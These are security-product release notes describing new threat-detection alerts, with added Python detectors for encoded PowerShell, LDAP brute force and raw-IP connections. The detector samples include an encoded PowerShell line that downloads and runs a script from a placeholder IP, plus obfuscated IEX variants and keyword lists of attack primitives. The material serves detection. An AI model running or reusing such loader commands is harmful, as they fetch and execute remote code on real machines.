Secure Cloud Analytics Release Notes
December 2024
New Features and Updates
- Base64 Encoding Detected Alert: This new alert indicates that a Base64 string was detected in a PowerShell command line. Detection is based on a combination of regular expressions and recognition of encoded commands (such as PowerShell's -EncodedCommand switch, which takes a Base64 argument). Attackers often use Base64 encoding as an obfuscation technique to hide malicious activity executed via PowerShell. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.
- Cloud Spreadsheet API C2 Channel Alert: This new alert indicates that a cloud spreadsheet application programming interface (API) may be in use by a threat actor or malware for command and control (C2), for example using Google Sheets or Microsoft Excel as a C2 channel. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.
- Connection to Raw Public IP Address Alert: This new alert indicates that a connection was made to a raw public IP address, that is, an external connection made by IP address rather than by domain name, from a process or file type for which this is unusual. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.
- LDAP Brute Force Attempt Alert: This new alert indicates that a device made more than 100 requests to port 389 (LDAP) or 636 (LDAPS) within 5 minutes. This is suspicious and can indicate an attempt to brute-force passwords over the LDAP protocol. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.
- Malware Communication Identified via EVE Alert: This new alert indicates that the Encrypted Visibility Engine (EVE) detected traffic between a process and a server that it classifies as likely malware communication. This alert requires Encrypted Traffic Analytics (ETA) and is disabled by default.
- Potential Misuse of the PuTTY Secure Copy Client Alert: This new alert indicates that use of the PuTTY Secure Copy Client (pscp.exe) was detected. Although the PuTTY Secure Copy Client is used for legitimate purposes, threat actors have been known to use this tool to exfiltrate victim data to their own infrastructure. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.
- Suspicious DNS over HTTPS Activity Alert: This new alert indicates that an internal server was detected exchanging traffic with a known DNS over HTTPS (DoH) server. This may indicate an attempt to evade DNS-based security controls. This alert requires Encrypted Traffic Analytics (ETA) and is disabled by default.
- Suspicious Download from Temporary File Service Alert: This new alert indicates that content was downloaded from a temporary file-sharing service by a command-line interpreter. Adversaries may use temporary file services to download and execute malicious code, or for exfiltration. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.
- Suspicious Request to Discord Alert: This new alert indicates a suspicious attempt to communicate with the Discord chat service using a tool other than the Discord desktop application or a web browser. Adversaries have been known to use Discord in this manner for command-and-control (C2) communications. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.
- Use of Evasive VPN - External proxy Alert: This new alert indicates that the Encrypted Visibility Engine (EVE) detected use of an evasive Virtual Private Network (VPN) provider or an external proxy. This alert requires Encrypted Traffic Analytics (ETA) and is disabled by default.
- Use of Remote Access Tools Alert: This new alert indicates that the Encrypted Visibility Engine (EVE) detected use of remote access tools. Remote access tools are used legitimately by systems administrators, but are also known to be used by threat actors, including advanced persistent threat (APT) groups. This alert requires Encrypted Traffic Analytics (ETA) and is disabled by default.
- Unusual Encoding on Command Line Alert: This new alert indicates a command line that appears to carry an encoded payload. Adversaries obfuscate payloads through encoding schemes such as ASCII character codes, hex, bytecode, Unicode, and others. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.
- VBS Script Connected to a Raw Public IP Alert: This new alert indicates that a Visual Basic Script (VBS) may have been used to download malware from a raw public IP address. This alert requires Cisco AnyConnect Secure Mobility Client Network Visibility Module (NVM) and is disabled by default.
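The Base64 Encoding Detected and Unusual Encoding on Command Line alerts both rest on pattern-matching the PowerShell command line reported by the endpoint. The Python below is an added illustration of that approach and is not Secure Cloud Analytics code: the regular expressions, the keyword list and the sample command lines are constructed for this example, and the encoded payload is generated by Base64-encoding a known string so that the sample is exact.

```python
"""Flag Base64 and other encoded payloads in PowerShell command lines.

Added example for the Base64 Encoding Detected and Unusual Encoding on Command
Line alerts. Not Secure Cloud Analytics code: the patterns, keywords and sample
command lines are constructed for illustration.
"""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the common short
# forms are listed (not exhaustive). The argument is Base64 of UTF-16LE text.
ENCODED_SWITCH = re.compile(
    r"(?i)(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/]{16,}={0,2})"
)
# Any long Base64-looking token, e.g. inside FromBase64String('...') in a -Command.
BASE64_TOKEN = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")
# Character-code and hex-byte obfuscation covered by the second alert.
CHAR_CODES = re.compile(r"(?i)(?:\[char\]\s*\d{1,3}\s*\+?\s*){4,}")
HEX_BYTES = re.compile(r"(?i)(?:0x[0-9a-f]{2}\s*,\s*){6,}0x[0-9a-f]{2}")
# Decoded-payload keywords worth surfacing to an analyst.
KEYWORDS = ("iex", "invoke-expression", "downloadstring", "frombase64string",
            "net.webclient", "bypass", "-nop", "hidden")


def decode_powershell_b64(token):
    """Decode a Base64 token as PowerShell does (UTF-16LE), falling back to UTF-8.

    Returns None when the token is not valid Base64 or decodes to binary junk;
    that screens out GUIDs, hashes and other long alphanumeric strings.
    """
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    for encoding in ("utf-16le", "utf-8"):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        if not text:
            continue
        readable = sum(c.isascii() and (c.isprintable() or c in "\r\n\t") for c in text)
        if readable / len(text) >= 0.9:
            return text
    return None


def _finding(kind, decoded):
    hits = [k for k in KEYWORDS if decoded and k in decoded.lower()]
    return {"kind": kind, "decoded": decoded, "keywords": hits}


def analyze_command_line(cmdline):
    """Return a list of findings for one command line; an empty list means clean."""
    findings = []
    m = ENCODED_SWITCH.search(cmdline)
    if m:
        findings.append(_finding("encoded_command_switch", decode_powershell_b64(m.group(1))))
    else:
        for token in BASE64_TOKEN.findall(cmdline):
            decoded = decode_powershell_b64(token)
            if decoded is not None:
                findings.append(_finding("bare_base64", decoded))
    if CHAR_CODES.search(cmdline):
        findings.append(_finding("char_code_sequence", None))
    if HEX_BYTES.search(cmdline):
        findings.append(_finding("hex_byte_sequence", None))
    return findings


# Constructed samples; the payload is encoded at runtime so the Base64 is exact.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode("ascii")
SAMPLE_COMMAND_LINES = [
    f"powershell.exe -NoP -W Hidden -enc {ENCODED}",
    "powershell.exe -c \"IEX([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('"
    + ENCODED + "')))\"",
    "powershell.exe -c \"IEX ([char]73+[char]69+[char]88+[char]32+[char]40)\"",
    "powershell.exe -c \"$b=0x49,0x45,0x58,0x20,0x28,0x4e,0x65;IEX([Text.Encoding]::ASCII.GetString($b))\"",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        for f in analyze_command_line(line):
            print(f["kind"], f["keywords"], (f["decoded"] or "")[:60])
```

The switch match is the high-confidence signal; the bare-Base64 match is noisier, which is why the token is decoded and checked for readable text before it is reported, so that GUIDs, hashes and certificate blobs on ordinary command lines do not fire. Decoding as UTF-16LE first matters because that is the encoding PowerShell expects for -EncodedCommand, and a UTF-8 decode of the same bytes would look like garbage.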
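The LDAP Brute Force Attempt, Connection to Raw Public IP Address and VBS Script Connected to a Raw Public IP alerts are all judgments over per-process flow records of the kind NVM produces. As an added example, not Cisco's implementation, the Python below applies the published threshold (more than 100 requests to port 389 or 636 within 5 minutes) as a per-host sliding window and flags raw-IP connections from a small assumed list of script hosts and other binaries for which that is unusual. The Flow record fields, the process list and the sample records are assumptions made for this example; the release notes do not publish the real alert's process list.

```python
"""Threshold and raw-IP detections over NVM-style per-process flow records.

Added example for the LDAP Brute Force Attempt, Connection to Raw Public IP
Address and VBS Script Connected to a Raw Public IP alerts. Not Secure Cloud
Analytics code: the Flow fields, the process list and the sample records are
constructed for illustration.
"""
import ipaddress
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Flow:
    ts: datetime
    host: str         # endpoint that originated the flow (NVM reports per device)
    process: str      # originating process name as reported by the endpoint
    dst_ip: str
    dst_port: int
    dst_domain: str   # "" when the process connected by IP without a name


LDAP_PORTS = {389, 636}               # LDAP and LDAPS
LDAP_MAX_REQUESTS = 100               # alert on MORE than this many requests ...
LDAP_WINDOW = timedelta(minutes=5)    # ... within a sliding 5-minute window

# Assumed policy list: script hosts and LOLBins for which a raw-IP connection is
# unusual. The real alert's list is not given in the release notes.
RAW_IP_UNUSUAL_PROCESSES = {"wscript.exe", "cscript.exe", "mshta.exe",
                            "regsvr32.exe", "rundll32.exe", "certutil.exe"}

# Hand-rolled instead of ipaddress.is_global, which also excludes the RFC 5737
# documentation blocks (192.0.2.0/24 etc.) that the sample records use.
NON_PUBLIC_V4 = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "240.0.0.0/4")]


def detect_ldap_brute_force(flows):
    """Per-host sliding window; returns (host, trigger_time, count) once per host."""
    windows = defaultdict(deque)
    alerted, alerts = set(), []
    for f in sorted(flows, key=lambda x: x.ts):
        if f.dst_port not in LDAP_PORTS:
            continue
        window = windows[f.host]
        window.append(f.ts)
        while f.ts - window[0] > LDAP_WINDOW:   # drop requests older than 5 minutes
            window.popleft()
        if len(window) > LDAP_MAX_REQUESTS and f.host not in alerted:
            alerted.add(f.host)
            alerts.append((f.host, f.ts, len(window)))
    return alerts


def is_raw_public_ip(dst_ip, dst_domain):
    """True when the destination was reached by a public IP with no domain name."""
    if dst_domain:
        return False
    addr = ipaddress.ip_address(dst_ip)
    if addr.version == 6:
        return addr.is_global
    return not any(addr in net for net in NON_PUBLIC_V4)


def detect_raw_public_ip(flows):
    """Flows where a process from the unusual list connected straight to a public IP."""
    return [f for f in flows
            if f.process.lower() in RAW_IP_UNUSUAL_PROCESSES
            and is_raw_public_ip(f.dst_ip, f.dst_domain)]


# Constructed sample telemetry.
BASE = datetime(2024, 12, 2, 9, 0, 0)
SAMPLE_FLOWS = []
for i in range(120):   # 120 binds in four minutes from one workstation: over the threshold
    SAMPLE_FLOWS.append(Flow(BASE + timedelta(seconds=2 * i), "ws-042", "ldp.exe",
                             "10.0.0.10", 389, "dc01.corp.example"))
for i in range(60):    # 60 queries over 30 minutes from an admin box: stays under it
    SAMPLE_FLOWS.append(Flow(BASE + timedelta(seconds=30 * i), "admin-01", "mmc.exe",
                             "10.0.0.10", 636, "dc01.corp.example"))
SAMPLE_FLOWS += [
    Flow(BASE, "ws-017", "wscript.exe", "192.0.2.45", 80, ""),              # VBS host, raw public IP: alert
    Flow(BASE, "ws-017", "chrome.exe", "192.0.2.45", 443, ""),              # browser: raw IP is not unusual
    Flow(BASE, "ws-017", "wscript.exe", "10.0.0.25", 445, ""),              # raw IP but internal: no alert
    Flow(BASE, "ws-017", "wscript.exe", "192.0.2.45", 443, "cdn.example"),  # reached by name: no alert
]

if __name__ == "__main__":
    for host, when, count in detect_ldap_brute_force(SAMPLE_FLOWS):
        print(f"LDAP brute force: {host} made {count} requests by {when:%H:%M:%S}")
    for f in detect_raw_public_ip(SAMPLE_FLOWS):
        print(f"Raw public IP: {f.host} {f.process} -> {f.dst_ip}:{f.dst_port}")
```

Two practical points the threshold wording hides: a fixed count over a sliding window fires the moment the 101st request lands inside any 5-minute span, so hosts that legitimately hammer LDAP (domain controllers replicating, monitoring agents, identity connectors) need an allow list before the alert is enabled; and the raw-IP check is only as good as its notion of "public", which is why the example spells out the non-public ranges rather than relying on a library flag whose exclusions (here, the RFC 5737 documentation blocks) may not match what an analyst means by an external address.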
Previous Release Notes
To view the Release Notes for previous releases, see Previous Release Notes for Secure Cloud Analytics.